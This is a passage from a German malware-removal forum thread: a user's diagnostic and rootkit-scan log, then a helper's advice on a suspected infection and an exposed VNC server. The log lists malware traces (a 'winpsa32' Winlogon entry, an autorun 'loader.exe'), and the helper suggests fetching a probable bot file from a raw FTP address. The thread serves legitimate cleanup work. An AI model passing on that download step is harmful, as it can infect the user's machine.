"item"="iTunesHelper"
"hkey"="HKLM"
"command"="\"C:\\Programme\\iTunes\\iTunesHelper.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\msnmsgr]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="msnmsgr"
"hkey"="HKCU"
"command"="\"C:\\Programme\\MSN Messenger\\msnmsgr.exe\" /background"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="NeroCheck"
"hkey"="HKLM"
"command"="C:\\Programme\\Gemeinsame Dateien\\Ahead\\Lib\\NeroCheck.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\updateMgr]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="AdobeUpdateManager"
"hkey"="HKCU"
"command"="C:\\Programme\\Adobe\\Acrobat 7.0\\Reader\\AdobeUpdateManager.exe AcRdB7_0_0"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Wireless Console]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="wcourier"
"hkey"="HKLM"
"command"="C:\\Programme\\ASUS\\Wireless Console\\wcourier.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Zshutdown]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="sysprep"
"hkey"="HKLM"
"command"="c:\\sysprep\\patch\\sysprep.cmd"
"inimapping"="0"


[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\shellserviceobjectdelayload]
"UPnPMonitor"="{e57ce738-33e8-4c51-8354-bb4de9d215d1}"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"=dword:00000000
"NoSaveSettings"=dword:00000000

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\run]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\winpsa32

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
HTTPFilter REG_MULTI_SZ HTTPFilter\0\0
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
DcomLaunch REG_MULTI_SZ DcomLaunch\0TermService\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0


[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{42f928a8-4e19-11da-8cbc-0015f2063691}]
Shell\AutoRun\command I:\loader.exe
*newlycreated* - HKEY_LOCAL_MACHINE\system\currentcontrolset\enum\root\LEGACY_COMHOST


Contents of the 'Scheduled Tasks' folder
C:\WINDOWS\tasks\AppleSoftwareUpdate.job
C:\WINDOWS\tasks\Norton Internet Security - Vollst„ndige Systempr�fung ausf�hren - REALTNT.job


********************************************************************

catchme 0.2 W2K/XP/Vista - userland rootkit detector by Gmer, 17 October 2006
http://www.gmer.net

scanning hidden processes ...

scanning hidden services ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0

********************************************************************

Completion time: 07-04-01 17:25:59
----------------------------------------------------------------------------
sys.txt

Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 64D4-EA7E

Verzeichnis von C:\

01.04.2007 17:32 0 sys.txt
01.04.2007 17:32 402 down.txt
01.04.2007 17:32 117 tmp.txt
01.04.2007 17:32 9.390 system.txt
01.04.2007 17:32 625 systemtemp.txt
01.04.2007 17:32 113.480 system32.txt
01.04.2007 17:25 15.198 ComboFix.txt
01.04.2007 17:12 1.610.612.736 pagefile.sys
30.03.2007 18:19 355 boot.ini
18.03.2007 17:12 18.517 Astra.hnf
12.03.2007 02:58 22.314 PctvMobileChannelScan.log
15.02.2007 16:00 8.192 BOOTSECT.BAK
15.02.2007 16:00 355 Boot.BAK
02.11.2006 11:53 438.840 bootmgr
---------------------------------------------------------------------------
down.txt

Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 64D4-EA7E

Verzeichnis von C:\WINDOWS\Downloaded Program Files

25.01.2006 13:43 367 LegitCheckControl.inf
08.10.2005 10:04 65 desktop.ini
26.05.2005 05:19 291 wuweb.inf
3 Datei(en) 723 Bytes
0 Verzeichnis(se), 18.216.098.304 Bytes frei
----------------------------------------------------------------------------
tmp.txt

Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 64D4-EA7E

Verzeichnis von C:\WINDOWS\temp

----------------------------------------------------------------------------
system.txt
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 64D4-EA7E

Verzeichnis von C:\WINDOWS

01.04.2007 17:18 1.174.592 WindowsUpdate.log
01.04.2007 17:14 50 wiaservc.log
01.04.2007 17:14 159 wiadebug.log
01.04.2007 17:13 0 0.log
01.04.2007 17:13 2.048 bootstat.dat
01.04.2007 17:11 32.590 SchedLgU.Txt
30.03.2007 21:18 1.031.371 setupapi.log
30.03.2007 21:02 1.864 wincmd.ini
30.03.2007 18:19 227 system.ini
30.03.2007 18:19 573 win.ini
29.03.2007 20:22 155 winamp.ini
29.03.2007 19:20 528 _delis32.ini
16.03.2007 12:39 35.730 iis6.log
16.03.2007 12:39 74.038 comsetup.log
16.03.2007 12:39 44.861 ntdtcsetup.log
16.03.2007 12:39 12.312 ocmsn.log
16.03.2007 12:39 84.924 tsoc.log
16.03.2007 12:39 1.374 imsins.log
16.03.2007 12:39 16.924 KB929338.log
16.03.2007 12:39 104.976 ocgen.log
16.03.2007 12:39 10.908 msgsocm.log
16.03.2007 12:39 222.578 FaxSetup.log
15.03.2007 11:10 5.483 duolabs.inf
12.03.2007 02:55 63 PixieTool.INI
12.03.2007 02:49 17.594 dasetup.log
09.03.2007 12:44 242 wcx_ftp.ini
09.03.2007 03:29 2.904 COM+.log
08.03.2007 22:27 69 NeroDigital.ini
08.03.2007 19:35 7.250 wmsetup.log
07.03.2007 15:02 372.736 suinsta4001.exe
04.03.2007 19:13 84.587 DirectX.log
01.03.2007 13:26 7.665 spupdsvc.log
01.03.2007 00:51 17.254 WgaNotify.log
01.03.2007 00:48 43.286 updspapi.log
23.02.2007 16:27 1.364 setupact.log
18.02.2007 13:27 1.374 imsins.BAK
18.02.2007 13:27 23.196 KB927779.log
18.02.2007 13:27 20.201 KB927802.log
18.02.2007 13:27 19.943 KB928255.log
18.02.2007 13:27 10.723 KB923723.log
18.02.2007 13:27 16.599 KB924667.log
18.02.2007 13:26 28.339 KB931836.log
18.02.2007 13:26 18.163 KB926436.log
18.02.2007 13:26 12.031 KB928090-IE7.log
18.02.2007 13:26 13.792 KB918118.log
18.02.2007 13:25 16.682 KB928843.log
15.02.2007 15:48 1.887 diagwrn.xml
15.02.2007 15:48 1.887 diagerr.xml
15.02.2007 14:30 0 setuperr.log
03.02.2007 04:10 505 GEARInstall.log
19.01.2007 09:00 4.760 KB929969.log
19.01.2007 08:59 14.430 KB923689.log
19.01.2007 08:58 13.195 KB925398.log
19.01.2007 08:57 13.436 KB923694.log
19.01.2007 08:57 12.443 KB926255.log
13.12.2006 00:53 2.729 mozver.dat
---------------------------------------------------------------------------
systemtemp.txt

Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 64D4-EA7E

Verzeichnis von C:\DOKUME~1\REALTNT\LOKALE~1\Temp

01.04.2007 17:27 289 datFind.zip
01.04.2007 17:21 16.384 Perflib_Perfdata_de0.dat
01.04.2007 17:21 16.384 Perflib_Perfdata_e88.dat
01.04.2007 17:20 565 WCESLog.log
01.04.2007 17:20 98.304 ~DFAF09.tmp
01.04.2007 17:20 98.304 ~DF40E.tmp
01.04.2007 17:20 16.384 Perflib_Perfdata_7a0.dat
7 Datei(en) 246.614 Bytes
0 Verzeichnis(se), 18.216.064.000 Bytes frei
---------------------------------------------------------------------------
tmp.txt
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 64D4-EA7E

Verzeichnis von C:\WINDOWS\temp

--------------------------------------------------------------------------

Ich hoffe ich hab nix vergessen.

Vielen Dank schon mal

(was für eine Datei mit dem BEfehl geladen werden sollte kann man nicht rausfinden oder?)

#4 Der Server scheint nicht mehr vorhanden zu sein, wenn ich das recht in Erinnerung habe ist diese IP auch Provider intern, sprich von Arcor.

Du kannst ja mal schauen ob durch eingabe im Browser eine Datei bekommst:

ftp//10.43.194.191/winsyncupx.exe

Wird aber wohl ein Bot sein.

Du hast/hattest mal einen Schaedling:
O20 - Winlogon Notify: winpsa32 - winpsa32.dll (file missing)
Schau, ob du diese Datei im System32 Ordner finden kannst
(alle Dateien anzeigen lassen: http://freenet-homepage.de/rene-gad/invisible.html )

Wozu hast du wireshak und Winvnc installiert? deinstalliere beides, wenn du es nicht brauchst, bzw sichere Winvnc besser ab!
__________
MfG Ralf
SEO-Spam Hunter

#5 Vielen Dank für die schnelle Antwort.
Die Datei konnte ich im system32 Verzeichnis nicht finden, hoffe die ist bereits
beseitigt worden.

Also warum ich wireshark installiert habe weiß ich ehrlich gesagt gar nicht mehr genau. Ein Kollege meinte mal ich könnte das doch dazu verwenden herauszufinden ob ein Wlan in der Nähe sei, oder so.... Habe es gerade deinstalliert.

So zum Thema Realvnc:
Das brauche ich um meinem Vater gelegentlich mit dem PC zu helfen. Also nur im Client Modus. Deshalb habe ich auch nie daran gedacht ein Passwort einzurichten. Der Realvnc Server-dienst war bisher auch immer deaktiviert.

Nun ist mir aber dank dir gerade gekommen das ich kürzlich auch diesen Dienst gestartet habe (unbeabsichtigt). Bei der Neuinstallation einer Logitech Webcam wird von einem verlangt einen clean restart zu machen. Dies hatte zur Folge das sämtliche Anwendungen die jemals eine Autostartfunktion hatten und von mir deaktiviert wurden im Autostart gelandet sind. Außerdem wurden auch die von mir deaktivierten Dienste, wie z.B. REALVNC Server, gestartet. Der Bootvorgang hat ca. 10 Minuten gedauert und noch viel schlimmer, der Realvnc server wurde ohne Passwort protection gestartet. Der Dienst ist inzwischen wieder deaktiviert und dazu habe ich noch ein Passwort für realvnc eingerichtet. Ich hoffe das Problem ist damit behoben und ich habe jetzt wieder meine Ruhe.
Glaubst du ich habe jetzt schon irgendwelche Schädlinge auf meinem Rechner die ein erneutes Eindringen ermöglichen? (Norton sagt nein...)

An dieser Stelle erst mal ein ganz herzliches Dankeschön an dich für deine großartige Hilfe! Ohne dich wäre ich wahrscheinlich nie darauf gekommen.

Viele Grüße

#6 Du kannst ja noch einen Kontrollscan mit F-secure und Drweb machen:

http://freedrweb.com/?lng=de
http://support.f-secure.de/ger/home/ols.shtml

Ports testen kann auch nicht starten: https://www.grc.com/x/ne.dll?bh0bkyd2

Nachtrag: Dieser Eintrag muss weg(anhaken, fix checked druecken) und sollte nach einem Neustart auch weg bleiben!
O20 - Winlogon Notify: winpsa32 - winpsa32.dll (file missing)
__________
MfG Ralf
SEO-Spam Hunter

#7 Habe den Eintrag weggehakt und er ist auch nach dem Neustart weggeblieben.

Ports habe ich getestet und Antivirenprogramm F-secure läuft.

Was bleibt noch zu sagen.

Vielen Dank für die Hilfe und beide Daumen hoch!!!